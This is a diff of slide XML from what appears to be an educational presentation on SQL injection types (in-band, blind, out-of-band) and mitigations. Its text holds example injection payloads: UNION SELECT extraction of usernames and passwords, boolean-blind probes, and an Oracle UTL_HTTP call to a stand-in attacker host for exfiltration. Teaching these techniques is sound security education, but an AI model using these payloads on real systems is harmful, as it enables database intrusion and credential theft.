-              </a:solidFill>
-              <a:latin typeface="Inconsolata"/>
-            </a:endParaRPr>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="99" name="TextShape 7"/>
-          <p:cNvSpPr txBox="1"/>
-          <p:nvPr/>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="4663440" y="2286000"/>
-            <a:ext cx="2743200" cy="457200"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-          <a:noFill/>
-          <a:ln>
-            <a:noFill/>
-          </a:ln>
-        </p:spPr>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="100" name="TextShape 8"/>
-          <p:cNvSpPr txBox="1"/>
-          <p:nvPr/>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="3111120" y="2286000"/>
-            <a:ext cx="6124320" cy="331200"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-          <a:noFill/>
-          <a:ln>
-            <a:noFill/>
-          </a:ln>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr lIns="90000" rIns="90000" tIns="45000" bIns="45000"/>
-          <a:p>
-            <a:r>
-              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
-                <a:solidFill>
-                  <a:srgbClr val="00ff00"/>
-                </a:solidFill>
-                <a:latin typeface="Inconsolata"/>
-              </a:rPr>
-              <a:t>site.com/products?id=1' and substr(user(), 1,1) = 'a</a:t>
+        <p:style>
+          <a:lnRef idx="0"/>
+          <a:fillRef idx="0"/>
+          <a:effectRef idx="0"/>
+          <a:fontRef idx="minor"/>
+        </p:style>
+        <p:txBody>
+          <a:bodyPr lIns="90000" rIns="90000" tIns="45000" bIns="45000">
+            <a:noAutofit/>
+          </a:bodyPr>
+          <a:p>
+            <a:pPr>
+              <a:lnSpc>
+                <a:spcPct val="100000"/>
+              </a:lnSpc>
+            </a:pPr>
+            <a:r>
+              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+                <a:solidFill>
+                  <a:srgbClr val="00ff00"/>
+                </a:solidFill>
+                <a:latin typeface="Inconsolata"/>
+              </a:rPr>
+              <a:t>+-------------------------------------+</a:t>
+            </a:r>
+            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+              <a:latin typeface="Arial"/>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:lnSpc>
+                <a:spcPct val="100000"/>
+              </a:lnSpc>
+            </a:pPr>
+            <a:r>
+              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+                <a:solidFill>
+                  <a:srgbClr val="00ff00"/>
+                </a:solidFill>
+                <a:latin typeface="Inconsolata"/>
+              </a:rPr>
+              <a:t>| product             | stockcount    |</a:t>
+            </a:r>
+            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+              <a:latin typeface="Arial"/>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:lnSpc>
+                <a:spcPct val="100000"/>
+              </a:lnSpc>
+            </a:pPr>
+            <a:r>
+              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+                <a:solidFill>
+                  <a:srgbClr val="00ff00"/>
+                </a:solidFill>
+                <a:latin typeface="Inconsolata"/>
+              </a:rPr>
+              <a:t>+-------------------------------------+</a:t>
+            </a:r>
+            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+              <a:latin typeface="Arial"/>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:lnSpc>
+                <a:spcPct val="100000"/>
+              </a:lnSpc>
+            </a:pPr>
+            <a:r>
+              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+                <a:solidFill>
+                  <a:srgbClr val="00ff00"/>
+                </a:solidFill>
+                <a:latin typeface="Inconsolata"/>
+              </a:rPr>
+              <a:t>| Model Car           | 342           |</a:t>
+            </a:r>
+            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+              <a:latin typeface="Arial"/>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:lnSpc>
+                <a:spcPct val="100000"/>
+              </a:lnSpc>
+            </a:pPr>
+            <a:r>
+              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+                <a:solidFill>
+                  <a:srgbClr val="00ff00"/>
+                </a:solidFill>
+                <a:latin typeface="Inconsolata"/>
+              </a:rPr>
+              <a:t>+-------------------------------------+</a:t>
             </a:r>
             <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
               <a:latin typeface="Arial"/>
@@ -5413,33 +6119,14 @@
       </p:sp>
     </p:spTree>
   </p:cSld>
-  <p:timing>
-    <p:tnLst>
-      <p:par>
-        <p:cTn id="11" dur="indefinite" restart="never" nodeType="tmRoot">
-          <p:childTnLst>
-            <p:seq>
-              <p:cTn id="12" dur="indefinite" nodeType="mainSeq"/>
-              <p:prevCondLst>
-                <p:cond delay="0" evt="onPrev">
-                  <p:tgtEl>
-                    <p:sldTgt/>
-                  </p:tgtEl>
-                </p:cond>
-              </p:prevCondLst>
-              <p:nextCondLst>
-                <p:cond delay="0" evt="onNext">
-                  <p:tgtEl>
-                    <p:sldTgt/>
-                  </p:tgtEl>
-                </p:cond>
-              </p:nextCondLst>
-            </p:seq>
-          </p:childTnLst>
-        </p:cTn>
-      </p:par>
-    </p:tnLst>
-  </p:timing>
+  <mc:AlternateContent>
+    <mc:Choice Requires="p14">
+      <p:transition spd="slow" p14:dur="2000"/>
+    </mc:Choice>
+    <mc:Fallback>
+      <p:transition spd="slow"/>
+    </mc:Fallback>
+  </mc:AlternateContent>
 </p:sld>
 </file>
 
@@ -5468,8 +6155,8 @@
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="213480" y="184320"/>
-            <a:ext cx="3718440" cy="364320"/>
+            <a:off x="182880" y="182880"/>
+            <a:ext cx="1776240" cy="363960"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -5486,7 +6173,9 @@
           <a:fontRef idx="minor"/>
         </p:style>
         <p:txBody>
-          <a:bodyPr lIns="90000" rIns="90000" tIns="45000" bIns="45000"/>
+          <a:bodyPr lIns="90000" rIns="90000" tIns="45000" bIns="45000">
+            <a:noAutofit/>
+          </a:bodyPr>
           <a:p>
             <a:pPr>
               <a:lnSpc>
@@ -5501,24 +6190,24 @@
                 <a:latin typeface="Inconsolata"/>
                 <a:ea typeface="DejaVu Sans"/>
               </a:rPr>
-              <a:t>Out of Band SQLi</a:t>
-            </a:r>
-            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
-              <a:latin typeface="Arial"/>
-            </a:endParaRPr>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="102" name="TextShape 2"/>
-          <p:cNvSpPr txBox="1"/>
+              <a:t>In-Band SQLi</a:t>
+            </a:r>
+            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+              <a:latin typeface="Arial"/>
+            </a:endParaRPr>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="102" name="CustomShape 2"/>
+          <p:cNvSpPr/>
           <p:nvPr/>
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="1097280" y="2286000"/>
-            <a:ext cx="9439200" cy="331200"/>
+            <a:off x="3017520" y="593280"/>
+            <a:ext cx="6491880" cy="601920"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -5528,34 +6217,47 @@
             <a:noFill/>
           </a:ln>
         </p:spPr>
-        <p:txBody>
-          <a:bodyPr lIns="90000" rIns="90000" tIns="45000" bIns="45000"/>
-          <a:p>
-            <a:r>
-              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
-                <a:solidFill>
-                  <a:srgbClr val="00ff00"/>
-                </a:solidFill>
-                <a:latin typeface="Inconsolata"/>
-              </a:rPr>
-              <a:t>site.com/products?id=1||UTL_HTTP.request('http://test.attacker.com/') – (Oracle) </a:t>
-            </a:r>
-            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
-              <a:latin typeface="Arial"/>
-            </a:endParaRPr>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="103" name="TextShape 3"/>
-          <p:cNvSpPr txBox="1"/>
+        <p:style>
+          <a:lnRef idx="0"/>
+          <a:fillRef idx="0"/>
+          <a:effectRef idx="0"/>
+          <a:fontRef idx="minor"/>
+        </p:style>
+        <p:txBody>
+          <a:bodyPr lIns="90000" rIns="90000" tIns="45000" bIns="45000">
+            <a:noAutofit/>
+          </a:bodyPr>
+          <a:p>
+            <a:pPr>
+              <a:lnSpc>
+                <a:spcPct val="100000"/>
+              </a:lnSpc>
+            </a:pPr>
+            <a:r>
+              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+                <a:solidFill>
+                  <a:srgbClr val="00ff00"/>
+                </a:solidFill>
+                <a:latin typeface="Inconsolata"/>
+              </a:rPr>
+              <a:t>In-band; where the results are returned in the response</a:t>
+            </a:r>
+            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+              <a:latin typeface="Arial"/>
+            </a:endParaRPr>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="103" name="CustomShape 3"/>
+          <p:cNvSpPr/>
           <p:nvPr/>
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="2103120" y="925560"/>
-            <a:ext cx="7863840" cy="572040"/>
+            <a:off x="2103480" y="1232280"/>
+            <a:ext cx="8137800" cy="2043000"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -5565,56 +6267,336 @@
             <a:noFill/>
           </a:ln>
         </p:spPr>
-        <p:txBody>
-          <a:bodyPr lIns="90000" rIns="90000" tIns="45000" bIns="45000"/>
-          <a:p>
-            <a:r>
-              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
-                <a:solidFill>
-                  <a:srgbClr val="00ff00"/>
-                </a:solidFill>
-                <a:latin typeface="Inconsolata"/>
-              </a:rPr>
-              <a:t>Executing SQL queries to exfiltrate data to an external service</a:t>
-            </a:r>
-            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
-              <a:solidFill>
-                <a:srgbClr val="00ff00"/>
-              </a:solidFill>
-              <a:latin typeface="Inconsolata"/>
+        <p:style>
+          <a:lnRef idx="0"/>
+          <a:fillRef idx="0"/>
+          <a:effectRef idx="0"/>
+          <a:fontRef idx="minor"/>
+        </p:style>
+        <p:txBody>
+          <a:bodyPr lIns="90000" rIns="90000" tIns="45000" bIns="45000">
+            <a:noAutofit/>
+          </a:bodyPr>
+          <a:p>
+            <a:pPr>
+              <a:lnSpc>
+                <a:spcPct val="100000"/>
+              </a:lnSpc>
+            </a:pPr>
+            <a:r>
+              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+                <a:solidFill>
+                  <a:srgbClr val="00ff00"/>
+                </a:solidFill>
+                <a:latin typeface="Inconsolata"/>
+              </a:rPr>
+              <a:t>site.com/products?id=1+and+union+select+username,+password+from+users</a:t>
+            </a:r>
+            <a:br/>
+            <a:br/>
+            <a:r>
+              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+                <a:solidFill>
+                  <a:srgbClr val="00ff00"/>
+                </a:solidFill>
+                <a:latin typeface="Inconsolata"/>
+              </a:rPr>
+              <a:t>select product, stockcount </a:t>
+            </a:r>
+            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+              <a:latin typeface="Arial"/>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:lnSpc>
+                <a:spcPct val="100000"/>
+              </a:lnSpc>
+            </a:pPr>
+            <a:r>
+              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+                <a:solidFill>
+                  <a:srgbClr val="00ff00"/>
+                </a:solidFill>
+                <a:latin typeface="Inconsolata"/>
+              </a:rPr>
+              <a:t>from products where id = 1 </a:t>
+            </a:r>
+            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+              <a:latin typeface="Arial"/>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:lnSpc>
+                <a:spcPct val="100000"/>
+              </a:lnSpc>
+            </a:pPr>
+            <a:r>
+              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+                <a:solidFill>
+                  <a:srgbClr val="00ff00"/>
+                </a:solidFill>
+                <a:latin typeface="Inconsolata"/>
+              </a:rPr>
+              <a:t>and </a:t>
+            </a:r>
+            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+              <a:latin typeface="Arial"/>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:lnSpc>
+                <a:spcPct val="100000"/>
+              </a:lnSpc>
+            </a:pPr>
+            <a:r>
+              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+                <a:solidFill>
+                  <a:srgbClr val="00ff00"/>
+                </a:solidFill>
+                <a:latin typeface="Inconsolata"/>
+              </a:rPr>
+              <a:t>union select username, password from users</a:t>
+            </a:r>
+            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+              <a:latin typeface="Arial"/>
+            </a:endParaRPr>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="104" name="CustomShape 4"/>
+          <p:cNvSpPr/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="3729960" y="3275280"/>
+            <a:ext cx="4754520" cy="3205440"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+          <a:ln>
+            <a:noFill/>
+          </a:ln>
+        </p:spPr>
+        <p:style>
+          <a:lnRef idx="0"/>
+          <a:fillRef idx="0"/>
+          <a:effectRef idx="0"/>
+          <a:fontRef idx="minor"/>
+        </p:style>
+        <p:txBody>
+          <a:bodyPr lIns="90000" rIns="90000" tIns="45000" bIns="45000">
+            <a:noAutofit/>
+          </a:bodyPr>
+          <a:p>
+            <a:pPr>
+              <a:lnSpc>
+                <a:spcPct val="100000"/>
+              </a:lnSpc>
+            </a:pPr>
+            <a:r>
+              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+                <a:solidFill>
+                  <a:srgbClr val="00ff00"/>
+                </a:solidFill>
+                <a:latin typeface="Inconsolata"/>
+              </a:rPr>
+              <a:t>+-------------------------------------+</a:t>
+            </a:r>
+            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+              <a:latin typeface="Arial"/>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:lnSpc>
+                <a:spcPct val="100000"/>
+              </a:lnSpc>
+            </a:pPr>
+            <a:r>
+              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+                <a:solidFill>
+                  <a:srgbClr val="00ff00"/>
+                </a:solidFill>
+                <a:latin typeface="Inconsolata"/>
+              </a:rPr>
+              <a:t>| product             | stockcount    |</a:t>
+            </a:r>
+            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+              <a:latin typeface="Arial"/>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:lnSpc>
+                <a:spcPct val="100000"/>
+              </a:lnSpc>
+            </a:pPr>
+            <a:r>
+              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+                <a:solidFill>
+                  <a:srgbClr val="00ff00"/>
+                </a:solidFill>
+                <a:latin typeface="Inconsolata"/>
+              </a:rPr>
+              <a:t>+-------------------------------------+</a:t>
+            </a:r>
+            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+              <a:latin typeface="Arial"/>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:lnSpc>
+                <a:spcPct val="100000"/>
+              </a:lnSpc>
+            </a:pPr>
+            <a:r>
+              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+                <a:solidFill>
+                  <a:srgbClr val="00ff00"/>
+                </a:solidFill>
+                <a:latin typeface="Inconsolata"/>
+              </a:rPr>
+              <a:t>| Model Car           | 342           |</a:t>
+            </a:r>
+            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+              <a:latin typeface="Arial"/>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:lnSpc>
+                <a:spcPct val="100000"/>
+              </a:lnSpc>
+            </a:pPr>
+            <a:r>
+              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+                <a:solidFill>
+                  <a:srgbClr val="00ff00"/>
+                </a:solidFill>
+                <a:latin typeface="Inconsolata"/>
+              </a:rPr>
+              <a:t>| vortex              | password1     |</a:t>
+            </a:r>
+            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+              <a:latin typeface="Arial"/>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:lnSpc>
+                <a:spcPct val="100000"/>
+              </a:lnSpc>
+            </a:pPr>
+            <a:r>
+              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+                <a:solidFill>
+                  <a:srgbClr val="00ff00"/>
+                </a:solidFill>
+                <a:latin typeface="Inconsolata"/>
+              </a:rPr>
+              <a:t>| st0rm               | arch4lyfe     |</a:t>
+            </a:r>
+            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+              <a:latin typeface="Arial"/>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:lnSpc>
+                <a:spcPct val="100000"/>
+              </a:lnSpc>
+            </a:pPr>
+            <a:r>
+              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+                <a:solidFill>
+                  <a:srgbClr val="00ff00"/>
+                </a:solidFill>
+                <a:latin typeface="Inconsolata"/>
+              </a:rPr>
+              <a:t>| jakob               | xssismybag    |</a:t>
+            </a:r>
+            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+              <a:latin typeface="Arial"/>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:lnSpc>
+                <a:spcPct val="100000"/>
+              </a:lnSpc>
+            </a:pPr>
+            <a:r>
+              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+                <a:solidFill>
+                  <a:srgbClr val="00ff00"/>
+                </a:solidFill>
+                <a:latin typeface="Inconsolata"/>
+              </a:rPr>
+              <a:t>| jake                | 1337jake!     |</a:t>
+            </a:r>
+            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+              <a:latin typeface="Arial"/>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:lnSpc>
+                <a:spcPct val="100000"/>
+              </a:lnSpc>
+            </a:pPr>
+            <a:r>
+              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+                <a:solidFill>
+                  <a:srgbClr val="00ff00"/>
+                </a:solidFill>
+                <a:latin typeface="Inconsolata"/>
+              </a:rPr>
+              <a:t>| josh                | notcasper     |</a:t>
+            </a:r>
+            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+              <a:latin typeface="Arial"/>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:lnSpc>
+                <a:spcPct val="100000"/>
+              </a:lnSpc>
+            </a:pPr>
+            <a:r>
+              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+                <a:solidFill>
+                  <a:srgbClr val="00ff00"/>
+                </a:solidFill>
+                <a:latin typeface="Inconsolata"/>
+              </a:rPr>
+              <a:t>+-------------------------------------+</a:t>
+            </a:r>
+            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+              <a:latin typeface="Arial"/>
             </a:endParaRPr>
           </a:p>
         </p:txBody>
       </p:sp>
     </p:spTree>
   </p:cSld>
-  <p:timing>
-    <p:tnLst>
-      <p:par>
-        <p:cTn id="13" dur="indefinite" restart="never" nodeType="tmRoot">
-          <p:childTnLst>
-            <p:seq>
-              <p:cTn id="14" dur="indefinite" nodeType="mainSeq"/>
-              <p:prevCondLst>
-                <p:cond delay="0" evt="onPrev">
-                  <p:tgtEl>
-                    <p:sldTgt/>
-                  </p:tgtEl>
-                </p:cond>
-              </p:prevCondLst>
-              <p:nextCondLst>
-                <p:cond delay="0" evt="onNext">
-                  <p:tgtEl>
-                    <p:sldTgt/>
-                  </p:tgtEl>
-                </p:cond>
-              </p:nextCondLst>
-            </p:seq>
-          </p:childTnLst>
-        </p:cTn>
-      </p:par>
-    </p:tnLst>
-  </p:timing>
+  <mc:AlternateContent>
+    <mc:Choice Requires="p14">
+      <p:transition spd="slow" p14:dur="2000"/>
+    </mc:Choice>
+    <mc:Fallback>
+      <p:transition spd="slow"/>
+    </mc:Fallback>
+  </mc:AlternateContent>
 </p:sld>
 </file>
 
@@ -5637,14 +6619,14 @@
       </p:grpSpPr>
       <p:sp>
         <p:nvSpPr>
-          <p:cNvPr id="104" name="CustomShape 1"/>
+          <p:cNvPr id="105" name="CustomShape 1"/>
           <p:cNvSpPr/>
           <p:nvPr/>
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="400680" y="246600"/>
-            <a:ext cx="3184200" cy="364320"/>
+            <a:off x="182880" y="182880"/>
+            <a:ext cx="1671120" cy="363960"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -5661,7 +6643,9 @@
           <a:fontRef idx="minor"/>
         </p:style>
         <p:txBody>
-          <a:bodyPr lIns="90000" rIns="90000" tIns="45000" bIns="45000"/>
+          <a:bodyPr lIns="90000" rIns="90000" tIns="45000" bIns="45000">
+            <a:noAutofit/>
+          </a:bodyPr>
           <a:p>
             <a:pPr>
               <a:lnSpc>
@@ -5676,24 +6660,24 @@
                 <a:latin typeface="Inconsolata"/>
                 <a:ea typeface="DejaVu Sans"/>
               </a:rPr>
-              <a:t>Mitigation of SQLi</a:t>
-            </a:r>
-            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
-              <a:latin typeface="Arial"/>
-            </a:endParaRPr>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="105" name="TextShape 2"/>
-          <p:cNvSpPr txBox="1"/>
+              <a:t>Blind SQLi</a:t>
+            </a:r>
+            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+              <a:latin typeface="Arial"/>
+            </a:endParaRPr>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="106" name="CustomShape 2"/>
+          <p:cNvSpPr/>
           <p:nvPr/>
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="4663440" y="1280160"/>
-            <a:ext cx="2695320" cy="331200"/>
+            <a:off x="3360960" y="813240"/>
+            <a:ext cx="5394600" cy="1611000"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -5703,34 +6687,78 @@
             <a:noFill/>
           </a:ln>
         </p:spPr>
-        <p:txBody>
-          <a:bodyPr lIns="90000" rIns="90000" tIns="45000" bIns="45000"/>
-          <a:p>
-            <a:r>
-              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
-                <a:solidFill>
-                  <a:srgbClr val="00ff00"/>
-                </a:solidFill>
-                <a:latin typeface="Inconsolata"/>
-              </a:rPr>
-              <a:t>Parameterised Queries!</a:t>
-            </a:r>
-            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
-              <a:latin typeface="Arial"/>
-            </a:endParaRPr>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="106" name="TextShape 3"/>
-          <p:cNvSpPr txBox="1"/>
+        <p:style>
+          <a:lnRef idx="0"/>
+          <a:fillRef idx="0"/>
+          <a:effectRef idx="0"/>
+          <a:fontRef idx="minor"/>
+        </p:style>
+        <p:txBody>
+          <a:bodyPr lIns="90000" rIns="90000" tIns="45000" bIns="45000">
+            <a:noAutofit/>
+          </a:bodyPr>
+          <a:p>
+            <a:pPr algn="ctr">
+              <a:lnSpc>
+                <a:spcPct val="100000"/>
+              </a:lnSpc>
+            </a:pPr>
+            <a:r>
+              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+                <a:solidFill>
+                  <a:srgbClr val="00ff00"/>
+                </a:solidFill>
+                <a:latin typeface="Inconsolata"/>
+              </a:rPr>
+              <a:t>Boolean blind</a:t>
+            </a:r>
+            <a:br/>
+            <a:br/>
+            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+              <a:latin typeface="Arial"/>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:pPr algn="ctr">
+              <a:lnSpc>
+                <a:spcPct val="100000"/>
+              </a:lnSpc>
+            </a:pPr>
+            <a:r>
+              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+                <a:solidFill>
+                  <a:srgbClr val="00ff00"/>
+                </a:solidFill>
+                <a:latin typeface="Inconsolata"/>
+              </a:rPr>
+              <a:t>Find the true/false condition</a:t>
+            </a:r>
+            <a:br/>
+            <a:r>
+              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+                <a:solidFill>
+                  <a:srgbClr val="00ff00"/>
+                </a:solidFill>
+                <a:latin typeface="Inconsolata"/>
+              </a:rPr>
+              <a:t>Useful when there is some visual feedback.</a:t>
+            </a:r>
+            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+              <a:latin typeface="Arial"/>
+            </a:endParaRPr>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="107" name="CustomShape 3"/>
+          <p:cNvSpPr/>
           <p:nvPr/>
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="4846320" y="3566160"/>
-            <a:ext cx="4480560" cy="331200"/>
+            <a:off x="3890160" y="2721960"/>
+            <a:ext cx="4572000" cy="693720"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -5740,37 +6768,58 @@
             <a:noFill/>
           </a:ln>
         </p:spPr>
-        <p:txBody>
-          <a:bodyPr lIns="90000" rIns="90000" tIns="45000" bIns="45000"/>
-          <a:p>
-            <a:r>
-              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
-                <a:solidFill>
-                  <a:srgbClr val="00ff00"/>
-                </a:solidFill>
-                <a:latin typeface="Inconsolata"/>
-              </a:rPr>
-              <a:t>Stored Procedures!</a:t>
-            </a:r>
-            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
-              <a:solidFill>
-                <a:srgbClr val="00ff00"/>
-              </a:solidFill>
-              <a:latin typeface="Inconsolata"/>
-            </a:endParaRPr>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="107" name="TextShape 4"/>
-          <p:cNvSpPr txBox="1"/>
+        <p:style>
+          <a:lnRef idx="0"/>
+          <a:fillRef idx="0"/>
+          <a:effectRef idx="0"/>
+          <a:fontRef idx="minor"/>
+        </p:style>
+        <p:txBody>
+          <a:bodyPr lIns="90000" rIns="90000" tIns="45000" bIns="45000">
+            <a:noAutofit/>
+          </a:bodyPr>
+          <a:p>
+            <a:pPr>
+              <a:lnSpc>
+                <a:spcPct val="100000"/>
+              </a:lnSpc>
+            </a:pPr>
+            <a:r>
+              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+                <a:solidFill>
+                  <a:srgbClr val="00ff00"/>
+                </a:solidFill>
+                <a:latin typeface="Inconsolata"/>
+                <a:ea typeface="Noto Sans CJK SC"/>
+              </a:rPr>
+              <a:t>site.com/products?id=1+and+1=1 (TRUE)</a:t>
+            </a:r>
+            <a:br/>
+            <a:r>
+              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+                <a:solidFill>
+                  <a:srgbClr val="00ff00"/>
+                </a:solidFill>
+                <a:latin typeface="Inconsolata"/>
+              </a:rPr>
+              <a:t>site.com/products?id=1+and+1=2 (FALSE)</a:t>
+            </a:r>
+            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+              <a:latin typeface="Arial"/>
+            </a:endParaRPr>
+          </a:p>
+        </p:txBody>
